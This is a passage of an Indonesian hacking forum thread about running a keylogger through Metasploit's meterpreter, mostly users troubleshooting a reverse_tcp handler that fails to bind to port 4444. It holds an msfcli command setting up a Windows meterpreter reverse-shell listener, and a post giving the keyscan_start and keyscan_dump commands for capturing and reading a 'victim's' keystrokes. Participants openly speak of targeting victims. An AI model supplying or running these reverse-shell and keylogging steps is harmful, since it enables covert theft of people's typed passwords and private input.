mengaktifkan keylogger dengan meterpreter
#11
(11-05-2011, 03:45 PM)blackmiracle Wrote:
(11-05-2011, 02:55 PM)cassaprodigy Wrote: dilihat dari prosesnya om sudah memakali port 4444 ... jadi om harus kill dulu .. cek saja dengan netstat

oh gitu om..yah sih tadi saya pake itu sampe 3 kali..soalnya error mulu om..klo warning kernel panik diatas maksudnya apa yah om??takut ada masalah nih ma BTnya..

gk apa2 kok ... itu hang saja .. tinggal di restart .. kebanyakan proses sampean

(11-05-2011, 03:59 PM)xsan-lahci Wrote: bagus nh treadnya,waktu iitu saya pernah baca tapi msfgui ka,sebenernya sama aja atau lebih powerfull yang ini ??

sama saja ... ini versi cli nya, om zee dari dulu memang gk suka make GUI

#12
(11-05-2011, 04:18 PM)cassaprodigy Wrote:
(11-05-2011, 03:45 PM)blackmiracle Wrote:
(11-05-2011, 02:55 PM)cassaprodigy Wrote: dilihat dari prosesnya om sudah memakali port 4444 ... jadi om harus kill dulu .. cek saja dengan netstat

oh gitu om..yah sih tadi saya pake itu sampe 3 kali..soalnya error mulu om..klo warning kernel panik diatas maksudnya apa yah om??takut ada masalah nih ma BTnya..

gk apa2 kok ... itu hang saja .. tinggal di restart .. kebanyakan proses sampean

oke deh om..oh yah dah ane coba lagi..dah ane restart tu kompi ane..tapi tetep tuh om keluar error..

Code:
=[ metasploit v4.1.2-dev [core:4.1 api:1.0]
+ -- --=[ 756 exploits - 397 auxiliary - 111 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14148 updated yesterday (2011.11.03)

PAYLOAD => windows/meterpreter/reverse_tcp_allports
LHOST => 192.168.56.1
LPORT => 4444
[-] Handler failed to bind to 192.168.56.1:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit exception: The address is already in use (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
napa tuh om??tuh program kaya gak ngenalin ip korban yah om??
blackmiracle@Back|track:~#I AM LINUXER

#13
netstat |grep 4444

paste ke sini hasilnya bro

#14
(11-07-2011, 12:52 PM)cassaprodigy Wrote: netstat |grep 4444

paste ke sini hasilnya bro

om cassaprodigy ni ane dah coba" lagi nih tutorial..ada error nih disini :
Code:
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.56.1 LPORT=4444 E
[*] Please wait while we load the module tree...
Warning: The following modules could not be loaded!

    /opt/framework/msf3/modules/post/windows/gather/dig.rb: SyntaxError (eval):56: Invalid next

[-] WARNING! The following modules could not be loaded!
[-]     /opt/framework/msf3/modules/post/windows/gather/dig.rb: SyntaxError (eval):56: Invalid next
napa yah om?
blackmiracle@Back|track:~#I AM LINUXER

#15
Lok via wifi bisa juga ta om...
Big Grin

#16
(11-10-2011, 01:50 PM)blackmiracle Wrote:
(11-07-2011, 12:52 PM)cassaprodigy Wrote: netstat |grep 4444

paste ke sini hasilnya bro

om cassaprodigy ni ane dah coba" lagi nih tutorial..ada error nih disini :
Code:
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.56.1 LPORT=4444 E
[*] Please wait while we load the module tree...
Warning: The following modules could not be loaded!

    /opt/framework/msf3/modules/post/windows/gather/dig.rb: SyntaxError (eval):56: Invalid next

[-] WARNING! The following modules could not be loaded!
[-]     /opt/framework/msf3/modules/post/windows/gather/dig.rb: SyntaxError (eval):56: Invalid next
napa yah om?

coba lihat di folder tersebut, ada ga file dig.rb nya? klo ga ada bisa download disini:
http://dev.metasploit.com/redmine/attach...121/dig.rb

#17
(11-11-2011, 01:49 AM)konspirasi Wrote:
(11-10-2011, 01:50 PM)blackmiracle Wrote:
(11-07-2011, 12:52 PM)cassaprodigy Wrote: netstat |grep 4444

paste ke sini hasilnya bro

om cassaprodigy ni ane dah coba" lagi nih tutorial..ada error nih disini :
Code:
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp_allports LHOST=192.168.56.1 LPORT=4444 E
[*] Please wait while we load the module tree...
Warning: The following modules could not be loaded!

    /opt/framework/msf3/modules/post/windows/gather/dig.rb: SyntaxError (eval):56: Invalid next

[-] WARNING! The following modules could not be loaded!
[-]     /opt/framework/msf3/modules/post/windows/gather/dig.rb: SyntaxError (eval):56: Invalid next
napa yah om?

coba lihat di folder tersebut, ada ga file dig.rb nya? klo ga ada bisa download disini:
http://dev.metasploit.com/redmine/attach...121/dig.rb

dah ada ko om dig.rb nya..tapi tetep kaya gitu om..
blackmiracle@Back|track:~#I AM LINUXER

#18
tambahan bro,

dimeterpreter ane biasan menggunakan keyloggernya dengan perintah keyscan_start dan untuk melihat hasil ketikan dari korban gunakan keyscan_dump.

#19
wew wew wew.. ini yg mantap............
di lengkapi picture tutorialny.....

CoolCoolCool

#20
mas, saya gagal

saya coba IP vbox...tapi dk mw terkonek....
di ifconfig eth0 tidak ada IP addres....

saya disini menggunakan vbox sbgai target






Users browsing this thread: 1 Guest(s)